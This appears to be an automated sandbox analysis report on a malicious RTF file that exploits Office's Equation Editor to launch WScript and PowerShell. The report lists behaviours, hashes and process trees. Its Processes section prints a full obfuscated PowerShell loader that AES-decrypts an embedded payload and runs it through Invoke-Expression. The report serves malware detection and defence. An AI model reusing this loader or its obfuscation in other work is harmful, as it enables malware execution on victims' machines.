Analysis
-
max time kernel
101s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
30-07-2024 01:06
Static task
static1
Behavioral task
behavioral1
Sample
112181241c7cb66758507fdce08e40069efa3e82bedb39eb98c833e5291109d3.rtf
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
112181241c7cb66758507fdce08e40069efa3e82bedb39eb98c833e5291109d3.rtf
Resource
win10v2004-20240709-en
General
-
Target
112181241c7cb66758507fdce08e40069efa3e82bedb39eb98c833e5291109d3.rtf
-
Size
94KB
-
MD5
f7c34c11bb5d9cdcece78edae0beff42
-
SHA1
96f2510fbb5c6203e21ead4dd55daaab59a86f4e
-
SHA256
112181241c7cb66758507fdce08e40069efa3e82bedb39eb98c833e5291109d3
-
SHA512
9b733c0d88c98adfe48e45079276ff7e059540445aa576b9eb637ac5c6881586336740384d71ab8a98e24b6f13c76d2ad88dd4437077dabd6a8d7829cd037164
-
SSDEEP
768:GS6MQ5k2WKcczrYFUoNVEbHfwFclPY49Ug+:tSWKccXYtclPYaA
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
EQNEDT32.EXEpowershell.exeflow pid process 3 1184 EQNEDT32.EXE 5 2836 powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
EQNEDT32.EXEWScript.exepowershell.exeWINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1656 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2836 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2836 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1656 WINWORD.EXE 1656 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
EQNEDT32.EXEWScript.exeWINWORD.EXEdescription pid process target process PID 1184 wrote to memory of 2732 1184 EQNEDT32.EXE WScript.exe PID 1184 wrote to memory of 2732 1184 EQNEDT32.EXE WScript.exe PID 1184 wrote to memory of 2732 1184 EQNEDT32.EXE WScript.exe PID 1184 wrote to memory of 2732 1184 EQNEDT32.EXE WScript.exe PID 2732 wrote to memory of 2836 2732 WScript.exe powershell.exe PID 2732 wrote to memory of 2836 2732 WScript.exe powershell.exe PID 2732 wrote to memory of 2836 2732 WScript.exe powershell.exe PID 2732 wrote to memory of 2836 2732 WScript.exe powershell.exe PID 1656 wrote to memory of 2980 1656 WINWORD.EXE splwow64.exe PID 1656 wrote to memory of 2980 1656 WINWORD.EXE splwow64.exe PID 1656 wrote to memory of 2980 1656 WINWORD.EXE splwow64.exe PID 1656 wrote to memory of 2980 1656 WINWORD.EXE splwow64.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\112181241c7cb66758507fdce08e40069efa3e82bedb39eb98c833e5291109d3.rtf"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2980
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemsitsgreattoreleasethedargon.vBS"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI78788979119683530985530790090406CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIxnPEzukRsRmzojEc2IqrsP6SzVylf4Lg1SsmmstVoJpV85MKYUwolNJkrLCOU5mJEMqMV+12DiEJ79pZ9yIaWkX01VWnCHXhB3HYMrMthz9dx3qVZG5quEhCgfQ6Zph6Ax6Lf4RH+PZR7dkdCwyLFaWfarqe/MQK49YgyXHqf8xybMvrfjAGQmSb8+3rz+o3mw40bVJxQ6m8tQdAkw6sCVRflXiNsvVPXd9z2Xi0ad/BdcF037OL0GwjtXRs4HTNhF7nzo4Ed5q/h3dLLIMSn2J+w2IWk+U5mgaGh75IlTQeR4SwCUwM45ySFmY56HoQ3vHGf2N49OpVzffLKifgubFQg5jD8FvJXO8aoVjOSTJCW69aOoGZTyK5J0HIGG5gJvjVmBk6igl+L+8yDRg781ddUNbUdYL922Qeo/CBrATzZ7nIcK64Yvri5jOiE57sC7hW5qPZlABLBL4Es2RDH83nRO7hflBwRplmsQrhQE08BcAtC5/H/dUM/kvdtXeeOX8Tuu7lESLHAr56TF9GhVOHA8prMr/tS2ZR0hyZfm7Bu3Tmdu+x2fwwzem8z+mBAmD/XKsxM6sTzoC3n1Ae0JVe73Zercxs+BmJJpbgXjZ+Q9u57NNqoS6U2CdC72jMJxHKDE4+VSNlWGl5O7OlHVD7o3Qsvf69qB0gqacfvTobcTSWza0EJF9kQ+5z3ZIN4RDUiT7O+w3Uqio7O7mnXWYIN/7LtXn62LFIRF3KVPy/5e+G9c8TEWAjIuK16XOWGMdYryMqIXHJ3DJ7W8AUmlfwhUaV8fAeSoTOsK9/b9nBvoFbAx5+hsd0hyHmpInkBC2DS/badEfD6PQJYrYcjkbGi0RoNniC2jHpPPdWIvIlnj2s8yLFbY35KLplcF4i3yVyXJ5kbYsqU3WF61Q38O8XXyiS2NXcTWzwb8zvTWXKUc8sjaWjj35wSYokblJCUj2oyo2B867XR0zuJ5ksaLRPpHeo9i8gtJ0FS5wmJ0XoFxiBz5+4fqoH7wQvJCQRXOb6f27I25twnb2ObtgolO3WOhl0izHAioF+1H3wM0sVxYtpu5z57tcag6+v30kNNbaBzxG+tzD5ToOrfi6Tce9xTGxoPOyFIIJJOJZGzdk4+HSKzeN9fZHZQXV8aKZDPujY3w9+PjqbvvKoSuY4psjbQuBgyGcFtkTHImmPuptN8Olz+SkUIa6Kcui5IEhw705+l8XTPBh3pewFIhVmN03zvUALvhifDR5gzFw3dgrcWS3k5q6w+21FcfYm4h9Rwx8pqfh5aEbMHkAsAhUbfwnDKj0Bzvd7b6h/aeqdx4BtT4PyDGMyDSZHQqQUtx5o2A/sy7aoFXDUGZw3QV3NebZhx2Lzm6xnxF43aMw22YC8GLh2Dks7+J5AnS+B3cZu3E5Mr1FIaQ/ekLxwOA/T8A==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2836
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD56ba9fff1680da3acfaec679aa89477db
SHA1d18b3135bfeb4303df38ce7bef7cdaa5618f0dcc
SHA2566adf034365210fa83f8568eba4d6b88e3608f2f01574743ed20bf797899b7f4f
SHA512e3613842bda578fb5dedc07db42804d1d442292b2e6014309051b96f74df80d31d44448597a1ff5feb4e8ef5788191ab1ae3905c4832baba160e1b9f07a83448
-
Filesize
403KB
MD51e06a0b540d76abb6e2712fa7e37138a
SHA11e7a793fe2bcd27f2757969043cdf5f5231e977e
SHA2567d9be9418bca7c307c7fed9ab4ad56058363ee8ad59ae401cfdbcbea7ff252e9
SHA5122b7cde726ee68b9d1cfa24c4413ebf5ab9f026b758d7cc4b6d9c6ad4eaf4b626abdde06e55d529ff2092e06f16dc8f86df935db118727733b1cd6c7284a5184a
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e